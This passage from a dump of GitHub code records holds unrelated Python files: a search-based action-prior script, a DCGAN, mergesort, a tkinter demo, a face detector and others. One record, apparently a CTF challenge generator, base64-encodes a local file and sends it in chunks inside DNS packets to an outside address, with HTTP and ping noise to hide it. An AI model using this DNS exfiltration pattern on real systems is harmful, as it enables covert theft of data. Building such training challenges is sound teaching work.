results_dict, action_priors = dict(), dict()\n if os.path.exists(output_path + 'google_search.json'):\n with open(output_path + 'google_search.json', 'r') as json_file:\n results_dict = json.load(json_file) \n\ndef check_queries_left(results_dict):\n queries_done, queries_left = 0, 0\n # Check how many queries are left\n for verb in verbs:\n v = transform_verb(verb)\n for v_option in v:\n for obj in objects:\n o = transform_obj(obj)\n for o_option in o:\n if not verb + ' ' + obj in results_dict:\n queries_left += 1\n elif not v_option + ' ' + o_option in results_dict[verb + ' ' + obj]:\n queries_left += 1\n else:\n queries_done += 1\n\n print('Queries done: {}, queries left: {}, total queries: {}'.format(\n queries_done, queries_left, queries_done + queries_left\n ))\n\n# It should print the total queries that must be done\ncheck_queries_left(results_dict) \n\nfor my_api_key, my_cse_id in tqdm(zip(api_keys, cse_ids)):\n # For each verb and object (and their synonyms)\n for verb in verbs:\n v = transform_verb(verb)\n for v_option in v:\n for obj in objects:\n o = transform_obj(obj)\n for o_option in o:\n try:\n if not verb + ' ' + obj in results_dict:\n results_dict[verb + ' ' + obj] = dict()\n action = v_option + ' * ' + o_option\n if not v_option + ' ' + o_option in results_dict[verb + ' ' + obj]:\n #print(action)\n result = google_search('\"' + action + '\"', my_api_key, my_cse_id)\n results_dict[verb + ' ' + obj][v_option + ' ' + o_option] = result\n with open(output_path + 'google_search.json', 'w') as f:\n json.dump(results_dict, f, indent=4)\n except:\n pass\n\n# It should print 0, otherwise it must be repeated\ncheck_queries_left(results_dict) \n\n# Create the prior using the computed results\naccum_total = 0.\nfor verb in verbs:\n for obj in objects:\n action = verb + ' ' + obj\n info = []\n for key in results_dict[action].keys():\n num = int(\n results_dict[action][key]['searchInformation']['totalResults']\n ) \n info.append(num)\n accum, nb_elems = 0., 0\n for i in range(len(info)):\n if info[i] > 0: \n accum += float(info[i])\n nb_elems += 1\n total = float(accum) / max(1,float(nb_elems))\n accum_total += total\n action_priors[action] = total\n \nwith open(output_path + 'unnormalised_action_priors.json', 'w') as f:\n json.dump(action_priors, f, indent=4)\n\nfor key in action_priors.keys():\n action_priors[key] /= float(accum_total) \n\nwith open(output_path + 'action_priors.json', 'w') as f:\n json.dump(action_priors, f, 
indent=4)","repo_name":"AdrianNunez/zeroshot-action-recognition-action-priors","sub_path":"create_google_prior.py","file_name":"create_google_prior.py","file_ext":"py","file_size_in_byte":7178,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"3324679394","text":"def solution(l, t):\n\n for i in range(len(l)):\n sum = 0\n for j in range(i, len(l)):\n sum = sum + l[j]\n if (sum > t):\n break\n elif (sum == t):\n return [i, j]\n return [-1, -1]\n\n\n # Your code here\nl = [4, 3, 10, 2, 8]\nt = 12\nprint(solution(l, t))\n","repo_name":"jaiswalprabhakar/Leetcode_editorial","sub_path":"Foobar/numbers station coded/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"29017646799","text":"from tkinter import *\nfrom tkinter import messagebox\n\nroot = Tk()\n# 调用组件的mainloop()方法,进入事件循环\n\nroot.title(\"fucking demo\")\n\nroot.geometry(\"500x300+500+500\")\n\n\n\nbtn01 = Button(root)\nbtn01[\"text\"] = \"hit me\"\n\nbtn01.pack()\n\n\n# e就是事件对象\ndef hitme(e):\n messagebox.showinfo(\"message\", \"u fuck hit me\")\n print(\"fuck u idiot\")\n\n\nbtn01.bind(\"\", hitme)\n\nroot.mainloop()\n","repo_name":"hfwang2020/TrackDectection","sub_path":"Pyqt5/src/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27563556543","text":"class salary:\r\n def get_input(s):\r\n s.ecode= input('enter ecode :') \r\n s.ename = raw_input('enter ename :')\r\n s.bs= float(input('enter basic salary :'))\r\n def cal(s):\r\n s.a= s.bs*0.4\r\n s.b= s.bs*0.2\r\n s.c= s.bs*0.1\r\n s.d= s.bs+s.b+s.c\r\n def display(a):\r\n print('Hra 40% of basic salary',a.a)\r\n print('br 20% of basic salary',a.b)\r\n print('ta 10% of basic salary',a.c)\r\n print('Gross salary',a.d)\r\n\r\n\r\n\r\nf=salary()\r\n\r\nprint(f)\r\n\r\nf.get_input()\r\nf.cal()\r\nf.display()\r\n\r\n \r\n \r\n \r\n","repo_name":"vimleshtech/python_feb","sub_path":"oops file.py","file_name":"oops file.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71096746659","text":"#!/usr/bin/env python3\n\nfrom scapy.all import *\nimport requests\nfrom random import randint\nfrom base64 import b64encode as b64e\nfrom re import findall\nfrom multiprocessing import Process\nfrom time import sleep\nimport sys\n\n\ndef generate_dns_flag(section):\n\tpacket = IP(dst='1.0.1.0')/\\\n\t\tUDP(dport=53)/\\\n\t\tDNS(rd=1, qd=DNSQR(qname='www.facebook.com'))/\\\n\t\tsection\n\tsend(packet, verbose=0)\n\ndef generate_http_noise():\n\tendpoint = \"/flag\"\n\turl = \"http://www.cyberyouth.sg\"\n\twhile True:\n\t\tr = requests.get(url+endpoint+str(randint(0,10)))\n\t\tsleep(3)\n\ndef generate_ping_noise():\n\twhile True:\n\t\tpacket = IP(dst='192.168.1.195')/ICMP(id=0x8)\n\t\tsend(packet)\n\t\tsleep(0.5)\t\n\ndef main():\n\twith open(\"text.txt\",\"r\") as target:\n\t\ttext = target.read().encode(\"UTF-8\")\n\t\ttarget.close()\n\tchunks = findall(\".\"*50,b64e(text).decode(\"UTF-8\"))\n\tp1 = Process(target=generate_http_noise)\n\tp1.start()\n\tp2 = Process(target=generate_ping_noise)\n\tp2.start()\n\tfor i in range(len(chunks)):\n\t\tgenerate_dns_flag(chunks[i])\n\t\ttime.sleep(0.3)\n\tp1.terminate()\n\tp2.terminate()\n\tsys.exit()\n\nif __name__ == 
\"__main__\":\n\tmain()\n","repo_name":"cyberyouthsg/cysc19-ctf","sub_path":"networking/look-closer/generate/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"34"} +{"seq_id":"14554391015","text":"#!usr/bin/python3\n#-*- coding: utf-8 -*-\n\n'''\n\t******************\n\t* Main *\n\t******************\n\t Powered By %s\n'''\n\n__author__ = 'Shadaileng'\n\nimport tkinter as tk\nimport tkinter.messagebox\n\nwindow = tk.Tk()\nwindow.title('Main Loop')\nwindow.geometry('400x600')\n\ntextVar = tk.StringVar()\ntextVar.set('Test String')\nlistVar = tk.StringVar()\nlistVar.set((1, 2, 3, 4))\nradiobuttonselect = tk.StringVar()\ncheckbuttonvalues = []\nisClick = False\nlabel = None\nbutton = None\nentry = None\nlistbox = None\nscale = None\ncanvas = None\n\ndef main():\n\tglobal label, button, entry, listbox, scale, canvas\n\tlabel = tk.Label(window, textvariable=textVar, bg='#BFEFFF', font=('Arial', 12), width=16, height=2)\n\tlabel.pack()\n\tbutton = tk.Button(window, text='click', bg='#C1FFC1', font=('Arial', 12), width=16, height=2, command=click)\n\tbutton.pack()\n\tentry = tk.Entry(window, width=21)\n\tentry.pack()\n\tlistbox = tk.Listbox(window, listvariable=listVar, width=21, height=4)\n\tlistbox.pack()\n\tfor x in ['A', 'B']:\n\t\tradiobutton = tk.Radiobutton(window, text=x, variable=radiobuttonselect, value=x)\n\t\tradiobutton.pack()\n\tscale = tk.Scale(window, label='drag it', from_=5, to=11, orient=tk.HORIZONTAL, length=200, showvalue=1, tickinterval=2, resolution=0.1, command=scaleValue)\n\tscale.pack()\n\tfor x in ['Python', 'C++']:\n\t\tvar = tk.StringVar()\n\t\tcheckbutton = tk.Checkbutton(window, text=x, variable=var, onvalue='love %s' % x, offvalue=None)\n\t\tcheckbutton.pack()\n\t\tcheckbuttonvalues.append(var)\n\tcanvas = tk.Canvas(window, bg='#00FFFF', width=200, height=200)\n\tcanvas.pack()\n\timage_file = tk.PhotoImage(file='ins.gif')\n\timage = canvas.create_image(100, 100, anchor='nw', image=image_file)\n\tx0, y0, x1, y1 = 30, 30, 80, 80\n\tline = canvas.create_line(x0, y0, x1, y1)\n\toval = canvas.create_oval(x0, y0, x1, y1, fill='#AB82FF')\n\tarc = canvas.create_arc(x0 + 50, y0 + 50, x1 + 50, y1 + 50, start=0, extent=180)\n\trect = canvas.create_rectangle(x0 + 100, y0, x1 + 100, y1)\n\tif isClick:\n\t\tcanvas.move(arc, 0, 1)\n\n\tmenubar = tk.Menu(window)\n\tfile = tk.Menu(menubar, tearoff=0)\n\tmenubar.add_cascade(label='File', menu=file)\n\n\tfile.add_command(label='Info', command=info)\n\tfile.add_separator()\n\tfile.add_command(label='Warning', command=warning)\n\tfile.add_separator()\n\tfile.add_command(label='Error', command=error)\n\tfile.add_separator()\n\tfile.add_command(label='Querstion', command=question)\n\n\twindow.config(menu=menubar)\n\n\tframe = tk.Frame(window, bg='red')\n\ttk.Label(frame, text='L', bg='#CCCFFF', font=('Arial', 12), width=4, height=2).pack(side='left')\n\ttk.Label(frame, text='T', bg='#CCCFFF', font=('Arial', 12), width=4, height=2).pack(side='top')\n\ttk.Label(frame, text='R', bg='#CCCFFF', font=('Arial', 12), width=4, height=2).pack(side='right')\n\ttk.Label(frame, text='B', bg='#CCCFFF', font=('Arial', 12), width=4, height=2).pack(side='bottom')\n\tframe.place(x = 10, y = 100, anchor='nw')\n\n\tframe = tk.Frame(window, bg='red')\n\tfor x in range(4):\n\t\tfor y in range(5):\n\t\t\ttk.Label(frame, text='B', bg='#CCCFFF',).grid(row=x, column=y, padx=10, pady=5)\n\tframe.place(x = 220, y = 150, 
anchor='nw')\n\n\ndef info():\n\ttk.messagebox.showinfo(title='Info', message='info')\n\ndef warning():\n\ttk.messagebox.showwarning(title='Warning', message='warning')\n\ndef error():\n\ttk.messagebox.showerror(title='Error', message='error')\n\ndef question():\n\ttk.messagebox.askquestion(title='Question', message='question')\n\ndef click():\n\tglobal isClick, label, button, entry\n\tif isClick:\n\t\ttextVar.set(entry.get() or 'None')\n\t\tentry.insert('insert', '*')\n\telse:\n\t\ttextVar.set('Click It')\n\t\tentry.insert('end', '*')\n\tif listbox.curselection():\n\t\tentry.insert('end', listbox.get(listbox.curselection()))\n#\tentry.insert('end', radiobuttonselect)\n\tfor x in checkbuttonvalues:\n\t\tif x:\n\t\t\tprint(x.get())\n\tisClick = not isClick\n\ndef scaleValue(value):\n\tentry.insert('end', value + ' ')\n\nif __name__ == '__main__':\n\tprint(__doc__ % __author__)\n\tprint(int('0xC1FFC1', 16))\n\tmain()\n\twindow.mainloop()\n","repo_name":"shadaileng/website_python","sub_path":"gui/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"3115717500","text":"import torch\nimport torch.nn as nn\nfrom torchvision import datasets\nfrom torchvision import transforms\nfrom torch.autograd import Variable\nfrom torchvision.utils import save_image\nfrom tqdm import tqdm\n\nbatch_size = 64\nnoise_size = 100\ntotal_epoch = 100\nimg_size = 28\noutput_channel = 1\n\n\nclass Generator(nn.Module):\n    def __init__(self):\n        super().__init__()\n\n        self.init_size = (img_size // 4)\n\n        self.l1 = nn.Sequential(nn.Linear(noise_size, 128 * self.init_size ** 2))\n        self.conv_block = nn.Sequential(\n            nn.BatchNorm2d(128),\n            nn.Upsample(scale_factor=2),\n            nn.Conv2d(128, 128, 3, stride=1, padding=1),\n            nn.BatchNorm2d(128, 0.8),\n            nn.LeakyReLU(0.2, inplace=True),\n            nn.Upsample(scale_factor=2),\n            nn.Conv2d(128, 64, 3, stride=1, padding=1),\n            nn.BatchNorm2d(64, 0.8),\n            nn.LeakyReLU(0.2, inplace=True),\n            nn.Conv2d(64, output_channel, 3, stride=1, padding=1),\n            nn.Tanh()\n        )\n\n    def forward(self, z):\n        out = self.l1(z)\n        out = out.view(out.shape[0], 128, self.init_size, self.init_size)\n        img = self.conv_block(out)\n\n        return img\n\n\ndef disc_block(in_filters, out_filters, bn=True):\n    block = [nn.Conv2d(in_filters, out_filters, 3, 2, 1),\n             nn.LeakyReLU(0.2, inplace=True),\n             nn.Dropout2d(0.25)]\n\n    if bn:\n        block.append(nn.BatchNorm2d(out_filters, 0.8))\n\n    return block\n\n\nclass Discriminator(nn.Module):\n\n    def __init__(self):\n        super().__init__()\n\n        self.model = nn.Sequential(\n            *disc_block(output_channel, 16, bn=False),\n            *disc_block(16, 32),\n            *disc_block(32, 64),\n            *disc_block(64, 128),\n        )\n\n    def forward(self, img):\n        out = self.model(img)\n        out = out.view(out.shape[0], -1)\n\n        adv_layer = nn.Sequential(nn.Linear(out.shape[1], 1),\n                                  nn.Sigmoid())\n\n        if torch.cuda.is_available():\n            adv_layer.cuda()\n\n        validity = adv_layer(out)\n\n        return validity\n\n\ndef to_var(x):\n    if torch.cuda.is_available():\n        x = x.cuda()\n    return Variable(x)\n\n\ndef get_noise(x_size):\n    return torch.randn(x_size, noise_size)\n\n\n# Image processing\ntransform = transforms.Compose([\n    transforms.Grayscale(),\n    transforms.ToTensor(),\n    transforms.Normalize((0.5,), (0.5,))  # single-channel stats to match Grayscale()\n])\n\n# MNIST dataset\nmnist = datasets.MNIST(root='/tmp/',\n                       train=True,\n                       transform=transform,\n                       download=True)\n# Data loader\ndata_loader = torch.utils.data.DataLoader(dataset=mnist,\n                                          batch_size=batch_size,\n                                          shuffle=True)\n\nif 
torch.cuda.is_available():\n    D = Discriminator().cuda()\n    G = Generator().cuda()\nelse:\n    D = Discriminator()\n    G = Generator()\n\nbce_loss = nn.BCELoss()\nd_optimizer = torch.optim.Adam(D.parameters(), lr=0.0002)\ng_optimizer = torch.optim.Adam(G.parameters(), lr=0.0002)\n\nif torch.cuda.is_available():\n    D.cuda()\n    G.cuda()\n    bce_loss.cuda()\n\nfor epoch in range(total_epoch):\n    pbar = tqdm(data_loader)\n    pbar.set_description('{}'.format(epoch))\n\n    for x, _ in pbar:\n        # input data\n        curr_batch = x.size(0)\n        x_data = to_var(x)\n        sample_noise = to_var(get_noise(curr_batch))\n\n        # label\n        one_label = Variable(torch.ones(curr_batch, 1), requires_grad=False).cuda()\n        zero_label = Variable(torch.zeros(curr_batch, 1), requires_grad=False).cuda()\n\n        fake_img = G(sample_noise)\n\n        # discriminator\n\n        real_loss = bce_loss(D(x_data), one_label)\n        fake_loss = bce_loss(D(fake_img), zero_label)\n\n        d_loss = (real_loss + fake_loss) / 2\n\n        d_optimizer.zero_grad()\n        g_optimizer.zero_grad()\n\n        d_loss.backward(retain_graph=True)\n        d_optimizer.step()\n\n        # generator\n\n        g_loss = bce_loss(D(fake_img), one_label)\n\n        g_optimizer.zero_grad()\n        d_optimizer.zero_grad()\n\n        g_loss.backward()\n        g_optimizer.step()\n\n    fake_images = fake_img.view(fake_img.size(0), 1, 28, 28)\n    save_image(fake_images, '{}.png'.format(epoch), normalize=True)\n","repo_name":"yongjun823/style-to-go","sub_path":"gan/dcgan2.py","file_name":"dcgan2.py","file_ext":"py","file_size_in_byte":4282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"41529374798","text":" \n# [3, 1, 5, 4]\n# left = [3,1], right = [5,4]\n# left_sorted([3,1])\n# left = [3], right = [1]\n# left_sorted([3]) = [3]\n# right_sorted([1]) = [1]\n# return merge([3], [1]) => [1, 3]\n# left_sorted = [1,3]\n\n# right_sorted([5, 4])\n# left = [5], right = [4]\n# left_sorted([5]) = [5]\n# right_sorted([4]) = [4]\n# merge([5], [4]) => return [4, 5]\n# right_sorted = [4, 5]\n\n# return merged([1,3], [4,5]) => [1,3,4,5]\n\ndef merge(left,right):\n    i, j = 0, 0\n    lst = []\n    while i < len(left) and j < len(right):\n        if left[i] < right[j]:\n            lst.append(left[i])\n            i += 1\n        else:\n            lst.append(right[j])\n            j += 1\n    lst += left[i:]\n    lst += right[j:]\n    return lst\n    \ndef mergesort(arr):\n    if len(arr) == 1:\n        return arr\n    left = arr[:len(arr) // 2]\n    right = arr[len(arr) // 2:]\n    left_sorted = mergesort(left)\n    right_sorted = mergesort(right)\n    \n    return merge(left_sorted, right_sorted)\n\narr = [3, 1, 5, 4]\nprint(mergesort(arr))\n","repo_name":"devemauricio/python_projects","sub_path":"mergesort.py","file_name":"mergesort.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"71872855138","text":"\nimport ROOT\nROOT.gInterpreter.Declare(\"\"\"\n\nusing RVecF = ROOT::VecOps::RVec<float>;\nusing RVecB = ROOT::VecOps::RVec<bool>;\n\ntemplate<typename T>\nT DeltaR(T eta1, T phi1, T eta2, T phi2){\n    const T dphi = ROOT::Math::VectorUtil::Phi_mpi_pi(phi2 - phi1);\n    const T deta = eta2-eta1;\n    return std::hypot(dphi, deta);\n}\n\nRVecB DeltaRMatch(const RVecF& eta1, const RVecF& phi1,\n                  const std::vector<const RVecF*>& eta2,\n                  const std::vector<const RVecF*>& phi2, float dR)\n{\n    RVecB mask(eta1.size(), false);\n    for(size_t idx1 = 0; idx1 < eta1.size(); ++idx1) {\n        bool has_match = false;\n        for(size_t col = 0; !has_match && col < eta2.size(); ++col) {\n            for(size_t idx2 = 0; !has_match && idx2 < eta2[col]->size(); ++idx2) {\n                has_match = DeltaR(eta1[idx1], phi1[idx1], 
eta2[col]->at(idx2), phi2[col]->at(idx2)) < dR;\n            }\n        }\n        mask[idx1] = has_match;\n    }\n    return mask;\n}\n\"\"\")\n\ndef skim(df):\n    columns = [ str(c) for c in df.GetColumnNames() ]\n    ref_objects = [ ('L1Tau', '_tmp'), ('Tau', ''), ('Jet', '') ]\n    for obj, suffix in ref_objects:\n        df = df.Define(f'{obj}_sel', f'{obj}_pt > 15 && abs({obj}_eta) < 2.7')\n        sample_c = None\n        for c in columns:\n            if c.startswith(obj + '_'):\n                if len(suffix) > 0:\n                    df = df.Define(c + suffix, f'{c}[{obj}_sel]')\n                else:\n                    df = df.Redefine(c, f'{c}[{obj}_sel]')\n                sample_c = c\n        counter = 'n' + obj\n        if len(suffix) == 0 and sample_c and counter in columns:\n            df = df.Redefine(counter, f'static_cast<int>({sample_c}.size())')\n    ref_eta = [ f'&{obj}_eta{suffix}' for obj, suffix in ref_objects ]\n    ref_phi = [ f'&{obj}_phi{suffix}' for obj, suffix in ref_objects ]\n    ref_eta_str = '{' + ', '.join(ref_eta) + '}'\n    ref_phi_str = '{' + ', '.join(ref_phi) + '}'\n    for obj in [ 'PixelTrack', 'PFCand', 'RecHitHBHE', 'RecHitEB', 'RecHitEE' ]:\n        df = df.Define(f'{obj}_sel', f'DeltaRMatch({obj}_eta, {obj}_phi, {ref_eta_str}, {ref_phi_str}, 0.5f)')\n        sample_c = None\n        for c in columns:\n            if c.startswith(obj + '_'):\n                df = df.Redefine(c, f'{c}[{obj}_sel]')\n                sample_c = c\n        counter = 'n' + obj\n        if sample_c and counter in columns:\n            df = df.Redefine(counter, f'static_cast<int>({sample_c}.size())')\n    return df","repo_name":"cms-tau-pog/TauMLTools","sub_path":"Production/python/skimHLT.py","file_name":"skimHLT.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"34"}
{"seq_id":"41282777119","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- \n# @Time    : 12/18/2018 4:12 PM \n# @Author  : Xiang Chen (Richard)\n# @File    : split_abnormal_ais_per_day.py \n# @Software: PyCharm\nimport glob\nimport pandas as pd\n\"\"\"\nThe split_abnormal_ais_per_day script is used to split the AIS data per day. Due to the AIS devices' uneven sampling\nphenomena, this function can split off the abnormal trajectory. Before doing this, I calculate the\ndelta_heading. If the delta_heading is abnormal, it should be split from the same-day AIS trajectory file.\nHere, the threshold value of delta_heading is 20. 
It refers to navigational maneuvering knowledge.\n\"\"\"\ndef save_data_into_file(new_file, current_position):\n    \"\"\"\n    This function is used to save the split files.\n    \"\"\"\n    name_mmsi = int(new_file.iloc[0]['MMSI'])\n    name_day = int(new_file.iloc[0]['Day'])\n    new_file.to_csv('/home/ucesxc0/Scratch/output/split_abnormal_ais_trajectory_per_day/result/%d-%d-%d.csv'%(name_mmsi,name_day,current_position),index=False)\n\n# read the files\nfile_address = glob.glob('/home/ucesxc0/Scratch/output/split_abnormal_ais_trajectory_per_day/AIS_trajectory_include_delta_time_speed_heading/*.csv')\nthreshold_heading_max_value = 20\nfor file in file_address:\n    file_load = pd.read_csv(file)\n    delta_heading = list(file_load['delta_heading'])\n    # find the abnormal trajectory points in the whole trajectory file.\n    index_split = file_load[file_load.delta_heading >= threshold_heading_max_value].index.tolist()\n    if len(index_split) >= 1:\n        # after that, add the starting point and ending point into the split list.\n        index_split.insert(0, 0)\n        index_split.append(len(delta_heading))\n        for i in range(0, len(index_split) - 1):\n            new_file = file_load.iloc[index_split[i]:index_split[i + 1]]\n            current_position = i\n            save_data_into_file(new_file, current_position)\n    else:\n        # output the file that cannot be processed\n        name_mmsi = int(file_load.iloc[0]['MMSI'])\n        name_day = int(file_load.iloc[0]['Day'])\n        file_load.to_csv('/home/ucesxc0/Scratch/output/split_abnormal_ais_trajectory_per_day/result/%d-%d.csv'%(name_mmsi,name_day),index=False)\n","repo_name":"rechardchen123/Ship_movement_classification_from_AIS","sub_path":"1.Ship_Movement_Image_Generation_Labeling/1.Process_ais_data/2.split_abnormal_ais_per_day.py","file_name":"2.split_abnormal_ais_per_day.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"34"}
{"seq_id":"19126290802","text":"# returns the square of a number\ndef carre(x):\n    return x**2\n\n# counts the number of vowels in a text\ndef compt_voyelles(texte):\n    cpt=0\n    for char in texte:\n        if char in \"aeiouyAEIOUY\":\n            cpt+=1\n    return cpt\n\nprint(__name__)\n\nif __name__ == \"__main__\":\n    print(carre(5))\n    print(compt_voyelles(\"toto\"))\n\n\n","repo_name":"achouak2014/Python","sub_path":"modules/module1.py","file_name":"module1.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"20168504403","text":"from __future__ import unicode_literals\nfrom django.core.urlresolvers import reverse\nfrom django.db import models\n\nclass Item(models.Model):\n\n    text = models.CharField(default='', max_length=32, db_index=True)\n    list = models.ForeignKey('List', default='')\n\n    class Meta:\n        unique_together = ('list', 'text')\n\nclass List(models.Model):\n\n    def get_absolute_url(self):\n        return reverse('view_list', args=[self.id])\n","repo_name":"yatindrarao/Super-Lists","sub_path":"lists/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"20522949473","text":"# -*- coding: utf-8 -*-\nimport os\nimport json\nimport torch\nfrom convlab2.policy.vhus.util import capital\nfrom convlab2.task.multiwoz.goal_generator import GoalGenerator\nfrom convlab2.policy.vhus.multiwoz.usermanager import UserDataManager\nfrom convlab2.policy.vhus.usermodule import VHUS\nfrom convlab2.policy.vhus.vhus import 
UserPolicyVHUSAbstract\n\nDEVICE = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nDEFAULT_DIRECTORY = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"models\")\nDEFAULT_ARCHIVE_FILE = os.path.join(DEFAULT_DIRECTORY, \"vhus_simulator_multiwoz.zip\")\n\nclass UserPolicyVHUS(UserPolicyVHUSAbstract):\n\n    def __init__(self,\n                 load_from_zip=False,\n                 archive_file=DEFAULT_ARCHIVE_FILE,\n                 model_file='https://huggingface.co/ConvLab/ConvLab-2_models/resolve/main/vhus_simulator_multiwoz.zip'):\n        with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'config.json'), 'r') as f:\n            config = json.load(f)\n        manager = UserDataManager()\n        voc_goal_size, voc_usr_size, voc_sys_size = manager.get_voc_size()\n        self.user = VHUS(config, voc_goal_size, voc_usr_size, voc_sys_size).to(device=DEVICE)\n        self.goal_gen = GoalGenerator()\n        self.manager = manager\n        self.user.eval()\n\n        if load_from_zip:\n            self.load(archive_file, model_file, config['load'])\n\n    def predict(self, state):\n        usr_action = super().predict(state)\n        return usr_action\n","repo_name":"thu-coai/ConvLab-2","sub_path":"convlab2/policy/vhus/multiwoz/vhus.py","file_name":"vhus.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":429,"dataset":"github-code","pt":"34"}
{"seq_id":"72780859939","text":"import cv2\r\nimport matplotlib.pyplot as plt\r\n\r\n#defining the classes\r\n\r\nclass FaceDetector(object):\r\n    def __init__(self, xml_path):\r\n        self.classifier = cv2.CascadeClassifier(xml_path)\r\n\r\n    def detect(self, image, biggest_only = True) :\r\n        scale_factor = 1.2\r\n        min_neighbors = 5\r\n        min_size = (30,30)\r\n        flags = cv2.CASCADE_FIND_BIGGEST_OBJECT | \\\r\n                cv2.CASCADE_DO_ROUGH_SEARCH if biggest_only else \\\r\n                cv2.CASCADE_SCALE_IMAGE\r\n\r\n        faces_coord = self.classifier.detectMultiScale(image, scaleFactor= scale_factor, minNeighbors = min_neighbors,\r\n                                                       minSize = min_size, flags = flags)\r\n\r\n        return faces_coord\r\n\r\n\r\n#initializing the camera\r\nwebcam = cv2.VideoCapture(0)\r\nprint(webcam.isOpened())\r\n\r\n#initializing the detector\r\ndetector = FaceDetector(\"haarcascade_frontalface_default.xml\")\r\n\r\n\r\n\r\n#drawing rectangle and displaying frame\r\nwhile webcam.isOpened():\r\n    _, frame = webcam.read()\r\n    frame = cv2.flip(frame,1) #inverting the image\r\n    faces_coord = detector.detect(frame)\r\n    if len(faces_coord):\r\n        for (x,y,w,h) in faces_coord:\r\n            cv2.rectangle(frame, (x,y), (x+w, y+h), (150,150,0),8)\r\n    \r\n    cv2.imshow('Face Detector',frame)\r\n    #clear_output(wait = True)\r\n    \r\n    #code 27 is ESC key\r\n    if cv2.waitKey(20) & 0xFF ==27:\r\n        break\r\n\r\n\r\n\r\n#camera release \r\nwebcam.release()\r\n","repo_name":"asarthaks/FaceRecognizer","sub_path":"Face Detector.py","file_name":"Face Detector.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"}
{"seq_id":"28040407422","text":"import flair\nfrom flair.embeddings import TokenEmbeddings, StackedEmbeddings, DocumentEmbeddings\nfrom flair.data import Dictionary, Token, Sentence\nfrom flair.file_utils import cached_path\nfrom flair.training_utils import log_line\n\nimport os\nimport re\nimport logging\nfrom abc import abstractmethod\nfrom collections import Counter\nfrom functools import lru_cache\nfrom pathlib import Path\nfrom typing import List, Union, Dict, Tuple\n\nimport hashlib\n\nimport gensim\nimport numpy as np\nimport torch\nfrom torch.nn.utils.rnn 
import pack_padded_sequence, pad_packed_sequence\n\ntry:\n from bpemb import BPEmb\nexcept:\n print('Cannot import BPEmb')\n \ntry:\n from transformers import AutoTokenizer, AutoConfig, AutoModel\nexcept:\n print('Cannot import Transformers')\n\nimport torch.nn.functional as F\nfrom torch.nn import ParameterList, Parameter\nfrom torch.nn import Sequential, Linear, Conv2d, ReLU, MaxPool2d, Dropout2d\nfrom torch.nn import AdaptiveAvgPool2d, AdaptiveMaxPool2d\nfrom torch.nn import TransformerEncoderLayer, TransformerEncoder\n\nfrom src.models import EmbeddingAttention, FeatureEmbedding\n\n\nlog = logging.getLogger(\"flair\")\n\n\n\nclass AveragingBytePairEmbeddings(TokenEmbeddings):\n def __init__(\n self,\n language: str,\n dim: int = 100,\n syllables: int = 200000,\n cache_dir=Path(flair.cache_root) / \"embeddings\",\n emb_method='avg',\n ):\n \"\"\"\n Initializes BP embeddings. Constructor downloads required files if not there.\n \"\"\"\n\n if isinstance(cache_dir, str):\n cache_dir = Path(cache_dir)\n self.name: str = f\"bpe-{language}-{syllables}-{dim}\"\n self.static_embeddings = True\n self.embedder = BPEmb(lang=language, vs=syllables, dim=dim, cache_dir=cache_dir)\n\n self.emb_method = emb_method\n if self.emb_method in ['avg', 'first', 'last']:\n self.__embedding_length: int = self.embedder.emb.vector_size\n else:\n self.__embedding_length: int = self.embedder.emb.vector_size * 2\n super().__init__()\n\n @property\n def embedding_length(self) -> int:\n return self.__embedding_length\n\n def _add_embeddings_internal(self, sentences: List[Sentence]) -> List[Sentence]:\n\n for i, sentence in enumerate(sentences):\n\n for token, token_idx in zip(sentence.tokens, range(len(sentence.tokens))):\n\n if \"field\" not in self.__dict__ or self.field is None:\n word = token.text\n else:\n word = token.get_tag(self.field).value\n\n if word.strip() == \"\":\n # empty words get no embedding\n token.set_embedding(\n self.name, torch.zeros(self.embedding_length, dtype=torch.float)\n )\n else:\n # all other words get embedded\n embeddings = self.embedder.embed(word.lower())\n if self.emb_method == 'first':\n embedding = embeddings[0]\n elif self.emb_method == 'last':\n embedding = embeddings[-1]\n elif self.emb_method == 'avg':\n embedding = np.average(embeddings, axis=0)\n else:\n embedding = np.concatenate((embeddings[0], embeddings[-1]))\n token.set_embedding(\n self.name, torch.tensor(embedding, dtype=torch.float)\n )\n\n return sentences\n\n def __str__(self):\n return self.name\n\n def extra_repr(self):\n return \"model={}\".format(self.name)\n\n \nclass MetaEmbeddings(TokenEmbeddings):\n \"\"\"A stack of embeddings, used if you need to combine several different embedding types.\"\"\"\n\n def __init__(self, \n embeddings: List[TokenEmbeddings],\n use_average: 